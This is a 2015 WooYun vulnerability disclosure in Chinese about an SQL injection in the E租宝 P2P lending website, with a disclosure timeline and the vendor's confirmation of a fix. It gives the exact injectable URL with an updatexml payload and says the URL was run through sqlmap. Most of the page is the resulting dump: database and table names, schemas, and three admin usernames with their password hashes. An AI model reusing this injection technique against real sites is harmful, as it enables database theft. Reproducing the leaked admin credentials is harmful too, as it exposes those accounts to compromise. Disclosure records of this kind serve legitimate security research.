当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153443

漏洞标题:p2p安全之E租宝存在注入漏洞

相关厂商:E租宝

漏洞作者: 路人甲

提交时间:2015-11-10 21:55

修复时间:2015-12-26 10:16

公开时间:2015-12-26 10:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开

简要描述:

钰诚集团旗下,E租宝官网存在重大漏洞。非登录状态下,可进行SQL注入!

详细说明:

借鉴:
WooYun: 绿麻雀网贷系统通用注入一枚

1.png


http://www.ezubo.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)
打开如下:

2.png


果断将

http://www.ezubo.com/home/borrow/doDel/idarr/updatexml(1,if(1=1*,1,0x22),1)


扔进神器sqlmap

3.png

漏洞证明:

available databases [4]:
[*] ezubao_php
[*] information_schema
[*] mysql
[*] performance_schema
Database: ezubao_php
Table: lzh_accounts
[5 columns]
+----------+---------------------+
| Column | Type |
+----------+---------------------+
| id | int(10) unsigned |
| is_final | tinyint(3) unsigned |
| level_id | varchar(12) |
| name | varchar(50) |
| upd_time | timestamp |
+----------+---------------------+
Database: ezubao_php
Table: lzh_ad
[8 columns]
+------------+------------------+
| Column | Type |
+------------+------------------+
| ad_type | tinyint(4) |
| add_time | int(10) |
| content | varchar(5000) |
| end_time | int(10) |
| id | int(10) unsigned |
| start_time | int(10) |
| title | varchar(100) |
| upd_time | timestamp |
+------------+------------------+
Database: ezubao_php
[166 tables]
+-------------------------------+
| lzh_access_count |
| lzh_account_log |
| lzh_account_recharge |
| lzh_accounts |
| lzh_achievements |
| lzh_acl |
| lzh_active |
| lzh_active_level |
| lzh_ad |
| lzh_announcement |
| lzh_app_project_icon |
| lzh_area |
| lzh_article |
| lzh_article_area |
| lzh_article_category |
| lzh_article_category_area |
| lzh_article_notice |
| lzh_auser_dologs |
| lzh_ausers |
| lzh_auth |
| lzh_auto_borrow |
| lzh_baobiao |
| lzh_baobiao_copy |
| lzh_bid_info |
| lzh_borrow_fsf |
| lzh_borrow_info |
| lzh_borrow_info_copy |
| lzh_borrow_info_lock |
| lzh_borrow_investor |
| lzh_borrow_message |
| lzh_borrow_tip |
| lzh_borrow_verify |
| lzh_borrow_vouch |
| lzh_carousel |
| lzh_ceshi_member |
| lzh_ceshi_money |
| lzh_comment |
| lzh_cps |
| lzh_datacenter_sync |
| lzh_debit_credit |
| lzh_debit_credit_init |
| lzh_department |
| lzh_department_changelog |
| lzh_donate |
| lzh_draw_goods |
| lzh_email_log |
| lzh_exp_actor |
| lzh_exp_borrow |
| lzh_exp_interest |
| lzh_exp_invest |
| lzh_exp_money |
| lzh_exp_project |
| lzh_face_apply |
| lzh_feedback |
| lzh_financial_maneger |
| lzh_financial_offline_user |
| lzh_financial_sell_log |
| lzh_finanicial_manager_tmp |
| lzh_fmanager |
| lzh_fmanager_client_log |
| lzh_fmanager_client_static |
| lzh_fmanager_dept_static |
| lzh_fmanager_fmg_static |
| lzh_fmanager_invest_back |
| lzh_fmanager_invest_static |
| lzh_fmanager_log |
| lzh_fmanager_maping |
| lzh_fmanager_messages |
| lzh_fmanager_static |
| lzh_fmanager_status |
| lzh_fmanager_virtual_members |
| lzh_fmaneger_static |
| lzh_friend |
| lzh_global |
| lzh_hetong |
| lzh_inner_msg |
| lzh_interface |
| lzh_invest_credit |
| lzh_invest_detb |
| lzh_investoffline |
| lzh_investor_detail |
| lzh_key_value |
| lzh_leader_phone |
| lzh_lottery_draw |
| lzh_lottery_draw_status |
| lzh_market_address |
| lzh_market_goods |
| lzh_market_jifenlist |
| lzh_market_log |
| lzh_member_apply |
| lzh_member_audit |
| lzh_member_banks |
| lzh_member_borrow_show |
| lzh_member_contact_info |
| lzh_member_creditslog |
| lzh_member_data_info |
| lzh_member_department_info |
| lzh_member_ensure_info |
| lzh_member_financial_info |
| lzh_member_friend |
| lzh_member_house_info |
| lzh_member_info |
| lzh_member_integrallog |
| lzh_member_limitlog |
| lzh_member_login |
| lzh_member_money |
| lzh_member_moneylog |
| lzh_member_msg |
| lzh_member_payonline |
| lzh_member_phonelog |
| lzh_member_phoneshield |
| lzh_member_questionnaire |
| lzh_member_remark |
| lzh_member_safequestion |
| lzh_member_token |
| lzh_member_withdraw |
| lzh_members |
| lzh_members_status |
| lzh_moneylog_property |
| lzh_msg_offcial |
| lzh_msg_phonelog_join |
| lzh_msg_tpl |
| lzh_name_apply |
| lzh_navigation |
| lzh_new_department |
| lzh_pay_banknum |
| lzh_pay_banks |
| lzh_pay_posorder |
| lzh_payreturn_log |
| lzh_person_more |
| lzh_prize |
| lzh_prize_date |
| lzh_push_msg |
| lzh_push_token |
| lzh_qq |
| lzh_recommend_import_log |
| lzh_recommend_log |
| lzh_recommend_logs |
| lzh_red_key |
| lzh_red_packet |
| lzh_red_put |
| lzh_red_putuser |
| lzh_red_userkey |
| lzh_report_total_static |
| lzh_sheet |
| lzh_sms_log |
| lzh_smslog |
| lzh_spring_white_list |
| lzh_stat_accounting |
| lzh_stat_moneylog |
| lzh_sys_tip |
| lzh_tmp_ip |
| lzh_today_reward |
| lzh_transfer_borrow_info |
| lzh_transfer_borrow_info_lock |
| lzh_transfer_borrow_investor |
| lzh_transfer_detail |
| lzh_transfer_investor_detail |
| lzh_twhite |
| lzh_update_version |
| lzh_useredit_log |
| lzh_verify |
| lzh_video_apply |
| lzh_vip_apply |
| table_struct_change |
| think_cache |
+-------------------------------+
select user_name,user_pwd from lzh_ausers [3]:
[*] admin, ab044bb3707a5bb729ce9500ba08b240
[*] jiangjun, 9f2cf1d42d5bf5efc754898ac5a2ecc0
[*] zongchen, ce83ac766dc561d2ae1a206fb0cd0b94
Database: ezubao_php
Table: lzh_ausers
[17 columns]
+----------------+------------------+
| Column | Type |
+----------------+------------------+
| area_id | int(11) |
| area_name | varchar(10) |
| id | int(11) |
| is_ban | int(1) |
| is_kf | int(10) unsigned |
| last_log_ip | varchar(30) |
| last_log_time | int(10) |
| phone | varchar(20) |
| qq | varchar(20) |
| real_name | varchar(20) |
| u_company_flag | smallint(6) |
| u_group_id | smallint(6) |
| upd_time | timestamp |
| user_name | varchar(50) |
| user_pass | varchar(50) |
| user_pwd | varchar(50) |
| user_word | varchar(100) |
+----------------+------------------+

修复方案:

更新版本

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-11 10:15

厂商回复:

漏洞已修复,感谢白帽子

最新状态:

暂无